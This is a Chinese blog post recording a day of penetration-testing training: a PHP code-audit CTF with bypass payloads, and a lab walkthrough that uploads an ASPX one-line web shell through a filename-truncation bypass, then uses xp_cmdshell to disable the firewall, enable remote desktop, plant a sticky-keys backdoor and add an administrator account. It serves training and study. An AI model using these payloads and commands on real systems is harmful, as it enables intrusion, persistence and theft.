<!DOCTYPE html>


<html lang="zh-Hans">


<head>
  <meta charset="utf-8" />
    
  <meta name="description" content="soya的小屋" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    培训的那些日子day6 |  soya的小屋
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/%E5%85%B6%E4%BB%96%E7%BE%8E%E5%8C%96/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

</head>

</html>

<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-培训day6"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  培训的那些日子day6
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2020/11/17/%E5%9F%B9%E8%AE%ADday6/" class="article-date">
  <time datetime="2020-11-16T18:13:05.000Z" itemprop="datePublished">2020-11-17</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%9F%B9%E8%AE%AD%E8%AE%B0%E5%BD%95/">培训记录</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">1.5k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">6 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="上午"><a href="#上午" class="headerlink" title="上午"></a>上午</h1><h2 id="第一道题"><a href="#第一道题" class="headerlink" title="第一道题"></a>第一道题</h2><p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605438958023.png" alt="1605438958023"></p>
<p>看到url上user1等于一个base64编码。</p>
<p>解码后发现是ctfuser。</p>
<p>bp抓包，修改user1的值为admin的base64编码，用户名为admin。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605439322833.png" alt="1605439322833"></p>
<p>得到flag！</p>
<span id="more"></span>

<h2 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h2><p><strong>题目+分析</strong>。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$v1 </span>= <span class="number">0</span>;</span><br><span class="line"><span class="variable">$v2 </span>= <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$a </span>= (<span class="keyword">array</span>)json_decode(@<span class="variable">$_GET</span>[<span class="string">&#x27;w&#x27;</span>]);   <span class="comment">#把json格式的数据传入</span></span><br><span class="line">							       <span class="comment">#例子：$json = &#x27;&#123;&quot;foo-bar&quot;: 12345&#125;&#x27;;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (is_array(<span class="variable">$a</span>)) &#123;    <span class="comment">#判断是否为数组</span></span><br><span class="line">    is_numeric(@<span class="variable">$a</span>[<span class="string">&quot;bar1&quot;</span>]) ? <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>) : <span class="literal">NULL</span>; <span class="comment">#判断是否为纯数字，是的话触发die函数，否则为空</span></span><br><span class="line">    <span class="keyword">if</span> (@<span class="variable">$a</span>[<span class="string">&quot;bar1&quot;</span>]) &#123;</span><br><span class="line">        (<span class="variable">$a</span>[<span class="string">&quot;bar1&quot;</span>] &gt; <span class="number">2020</span>) ? <span class="variable">$v1 </span>= <span class="number">1</span> : <span class="literal">NULL</span>;    <span class="comment">#如果a大于2020，v1=1</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (is_array(@<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>])) &#123; <span class="comment">#如果bar2为数组</span></span><br><span class="line">        <span class="keyword">if</span> (count(<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>]) !== <span class="number">5</span> <span class="keyword">OR</span> !is_array(<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>][<span class="number">0</span>])) </span><br><span class="line">            <span class="comment">#bar2元素个数不为5或bar2的索引0不是数组，触发die函数</span></span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>);</span><br><span class="line">        <span class="variable">$pos </span>= array_search(<span class="string">&quot;cisp-pte&quot;</span>, <span class="variable">$a</span>[<span class="string">&quot;bar3&quot;</span>]);  <span class="comment">#查找bar3中的cisp-pte</span></span><br><span class="line">        <span class="variable">$pos </span>=== <span class="literal">false</span> ? <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>) : <span class="literal">NULL</span>; <span class="comment">#如果有，返回null</span></span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>] <span class="keyword">as</span> <span class="variable">$key </span>=&gt; <span class="variable">$val</span>) &#123; <span class="comment">#键值对循环，循环bar2</span></span><br><span class="line">            <span class="variable">$val </span>=== <span class="string">&quot;cisp-pte&quot;</span> ? <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>) : <span class="literal">NULL</span>; <span class="comment">#如果val循环的值为cisp-pte，触发die函数</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$v2 </span>= <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先w为json格式。</p>
<p><strong>第一个绕过：bar1不能是纯数字，但要大于2020。</strong></p>
<p>“bar1”:”2021a”</p>
<p><strong>第二个绕过：bar2是数组，元素为5且索引0为数组。</strong></p>
<p>“bar2”:[[1,2,3],2,3,4,5]</p>
<p><strong>第三个绕过：bar3内包含cisp-pte。</strong></p>
<p>“bar3”:”cisp-pte”</p>
<p><strong>构造的payload：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?w=&#123;&quot;bar1&quot;:&quot;2021a&quot; ,&quot;bar2&quot;:[[1,2,3],2,3,4,5],&quot;bar3&quot;:&quot;cisp-pte&quot;&#125;</span><br></pre></td></tr></table></figure>



<p><strong>变化版题目：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$v1 </span>= <span class="number">0</span>;</span><br><span class="line"><span class="variable">$v2 </span>= <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a </span>= (<span class="keyword">array</span>)json_decode(@<span class="variable">$_GET</span>[<span class="string">&#x27;w&#x27;</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (is_array(<span class="variable">$a</span>)) &#123;</span><br><span class="line">    is_numeric(@<span class="variable">$a</span>[<span class="string">&quot;bar1&quot;</span>]) ? <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>) : <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (@<span class="variable">$a</span>[<span class="string">&quot;bar1&quot;</span>]) &#123;</span><br><span class="line">        (<span class="variable">$a</span>[<span class="string">&quot;bar1&quot;</span>] &gt; <span class="number">2020</span>) ? <span class="variable">$v1 </span>= <span class="number">1</span> : <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (is_array(@<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>])) &#123;</span><br><span class="line">        <span class="keyword">if</span> (count(<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>]) !== <span class="number">5</span> <span class="keyword">OR</span> !is_array(<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>][<span class="number">0</span>]))</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>);</span><br><span class="line">        <span class="variable">$pos </span>= array_search(<span class="string">&quot;cisp-pte&quot;</span>, <span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>]);</span><br><span class="line">        <span class="variable">$pos </span>=== <span class="literal">false</span> ? <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>) : <span class="literal">NULL</span>;</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$a</span>[<span class="string">&quot;bar2&quot;</span>] <span class="keyword">as</span> <span class="variable">$key </span>=&gt; <span class="variable">$val</span>) &#123;  <span class="comment">#</span></span><br><span class="line">            <span class="variable">$val </span>=== <span class="string">&quot;cisp-pte&quot;</span> ? <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>) : <span class="literal">NULL</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$v2 </span>= <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$v1 </span>&amp;&amp; <span class="variable">$v2</span>) &#123;</span><br><span class="line">    <span class="keyword">include</span>(<span class="string">&quot;key.php&quot;</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$key</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>增添的绕过：需要array_search查找cisp-pte返回true，又需要forearch循环bar2键值对时无法找到cisp-pte。</strong></p>
<p>*关于array_search的知识——————————</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a=array(&quot;a&quot;=&gt;&quot;red&quot;,&quot;b&quot;=&gt;&quot;green&quot;,&quot;c&quot;=&gt;&quot;blue&quot;);</span><br><span class="line">echo array_search(&quot;red&quot;,$a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>在$a中寻找red（键值），返回的结果为a（键名）。</p>
<p>array的种类有三种，关联数组、索引数组和多维数组。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$array=array(1,2,0);</span><br><span class="line">var_dump(array_search(&#x27;JILAO&#x27;, $array));</span><br><span class="line">var_dump(array_search(&#x27;1bert&#x27;, $array));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>$array的类型是索引数组</strong>，返回的结果为2和0（<strong>索引值</strong>）.</p>
<p>因为JILAO不存在，返回的是0，所以在$array的索引是2，所以返回2.</p>
<p>而1bert中包含1，返回的是1，所以在$array的索引是0，返回0.</p>
<p>*———————————————————————</p>
<p><strong>构造的payload</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://172.30.97.10/Tkitn/1.php?w=&#123;&quot;bar1&quot;:&quot;2021a&quot; ,&quot;bar2&quot;:[[1,2,3],true,3,4,5]&#125;</span><br><span class="line">or</span><br><span class="line">http://172.30.97.10/Tkitn/1.php?w=&#123;&quot;bar1&quot;:&quot;2021a&quot; ,&quot;bar2&quot;:[[1,2,3],0,3,4,5]&#125;</span><br></pre></td></tr></table></figure>



<h1 id="下午"><a href="#下午" class="headerlink" title="下午"></a>下午</h1><p>打一个靶机（给了一个ip地址）。</p>
<p>首先扫描端口，扫描出了很多端口。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605435628009.png" alt="1605435628009"></p>
<p>一一尝试，发现27689端口可以访问成功。</p>
<p>扫描下目录。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436077669.png" alt="1605436077669"></p>
<p>访问响应200的页面。</p>
<p>default.aspx是一个登陆界面。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605435969422.png" alt="1605435969422"></p>
<p>web.config.bak是一个备份文件，下载下来看一看，发现里面存在数据库的相关内容（可以从中判断出是sql server）。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436181936.png" alt="1605436181936"></p>
<p>使用Navicat进行数据库连接，在userlists表中发现了用户名和密码。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436316088.png" alt="1605436316088"></p>
<p>尝试登陆。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436396135.png" alt="1605436396135"></p>
<p>登陆成功，获得第一个key！</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436426815.png" alt="1605436426815"></p>
<p>进入后台菜单后发现旁边有很多功能，其中就有文件上传功能。</p>
<p>这里就想到使用文件上传漏洞。</p>
<p>尝试上传一个马，由于网站是由aspx写的，所以上传aspx的一句话木马。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ Page Language=&quot;Jscript&quot;%&gt;&lt;%eval(Request.Item[&quot;aaa&quot;],&quot;unsafe&quot;);%&gt;</span><br></pre></td></tr></table></figure>

<p>显示无法上传。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436565363.png" alt="1605436565363"></p>
<p>使用bp抓包绕过。</p>
<p>尝试后发现修改文件后缀和content-type后可以上传成功。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436795152.png" alt="1605436795152"></p>
<p>查看管理上传文件界面，发现提示文件名称最长截取前32位。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605436910680.png" alt="1605436910680"></p>
<p>构建较长的文件名吧后缀挤掉！</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605437031115.png" alt="1605437031115"></p>
<p>成功！</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605437012014.png" alt="1605437012014"></p>
<p>使用蚁剑或菜刀连接，找到第二个key。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605437240346.png" alt="1605437240346"></p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605437281879.png" alt="1605437281879"></p>
<p>在菜刀连进的页面能看见两个bak文件，一个是最先前下载的，打开另一个看看。</p>
<p>里面有sa账号和账号密码（sa为<strong>sql server</strong>默认的管理员账号）</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605437448955.png" alt="1605437448955"></p>
<p>连接数据库。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605437708891.png" alt="1605437708891"></p>
<p>拿到最后一个key的方法有很多种。</p>
<p><strong>第一种：远程登录桌面</strong></p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">EXEC sp_configure &#x27;show advanced options&#x27;,<span class="number">1</span>;RECONFIGURE;  #启用xp_cmdshell</span><br><span class="line">EXEC sp_configure &#x27;xp_cmdshell&#x27;,<span class="number">1</span>;RECONFIGURE;  #打开xp_cmdshell,可以调用sql系统之外的命令</span><br><span class="line">exec master.dbo.xp_cmdshell &#x27;reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v &quot;fDenyTSConnections&quot; /t REG_DWORD /d <span class="number">0</span> /f&#x27;; #开启XP&amp;<span class="number">2003</span>终端服务</span><br><span class="line">exec master.dbo.xp_cmdshell &#x27;netsh firewall <span class="built_in">set</span> opmode <span class="built_in">mode</span>=DISABLE&#x27;  #关闭防火墙</span><br><span class="line">EXEC master.dbo.xp_cmdshell &#x27;<span class="built_in">cd</span> C:\WINDOWS\system&#x27; #进入system文件夹</span><br><span class="line">EXEC master.dbo.xp_cmdshell &#x27;<span class="built_in">copy</span> <span class="built_in">cmd</span>.exe C:\WINDOWS\system\sethc.exe&#x27; #替换沾滞键后门</span><br><span class="line">exec master..xp_cmdshell &#x27;<span class="built_in">net</span> user pte77 test666 /add&#x27; #添加pte77用户</span><br><span class="line">exec master..xp_cmdshell &#x27;<span class="built_in">net</span> localgroup administrators pte77 /add&#x27; #把pte77用户加入管理组</span><br></pre></td></tr></table></figure>

<p>*关于沾滞键后门</p>
<blockquote>
<p>sethc.exe （进程名称可能叫 sethc 或者 sethc.exe）文件的Windows的粘滞键。大概意思就是按5下shift后，windows就执行了system32下的sethc.exe。</p>
</blockquote>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605438120283.png" alt="1605438120283"></p>
<p>远程登录。</p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605438188044.png" alt="1605438188044"></p>
<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605438206784.png" alt="1605438206784"></p>
<p><strong>第二个方法，直接桌面查看key文件。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">exec master..xp_cmdshell &#x27;dir &quot;C:\Documents and Settings\Administrator\桌面\&quot; /A -D /B&#x27;</span><br><span class="line">exec xp_cmdshell &#x27;type &quot;C:\Documents and Settings\Administrator\桌面\key.txt&quot;&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/2020/%E6%9D%82/1605438493412.png" alt="1605438493412"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>上午的代码审计很少接触，不太熟悉。</p>
<p>下午的key前两个还好，第三个是真的做的时候一头雾水。</p>
<p>还是要多加练习，冲！</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p>三个key：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_24030907/article/details/106760426">https://blog.csdn.net/qq_24030907/article/details/106760426</a></p>
<p>命令：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/milantgh/p/3601865.html">https://www.cnblogs.com/milantgh/p/3601865.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/milantgh/p/3601865.html">https://www.cnblogs.com/milantgh/p/3601865.html</a></p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          Donate
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://www.soyawww.com/2020/11/17/%E5%9F%B9%E8%AE%ADday6/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%80%9D%E8%B7%AF%E8%AE%B0%E5%BD%95/" rel="tag">思路记录</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E9%9D%B6%E6%9C%BA/" rel="tag">靶机</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2020/12/05/%E5%9F%B9%E8%AE%AD%E7%9A%84day7/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            培训的那些日子day7
          
        </div>
      </a>
    
    
      <a href="/2020/11/15/%E5%9F%B9%E8%AE%ADday5/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">培训的那些日子day5</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "4C1UYtlJuMPjaLshBufGIn2e-gzGzoHsz",
    app_key: "NbpumEIJ4G7cOOl9aQOS4YsR",
    path: window.location.pathname,
    avatar: "mp",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2019-2021
        <i class="ri-heart-fill heart_icon"></i> soya
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        Powered by <a href="https://hexo.io" target="_blank">Hexo</a>
        <span class="division">|</span>
        Theme - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="https://soya-1300102518.cos.ap-shenzhen-fsi.myqcloud.com/%E5%85%B6%E4%BB%96%E7%BE%8E%E5%8C%96/%E5%A4%B4%E5%83%8F.jpg" alt="soya的小屋"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

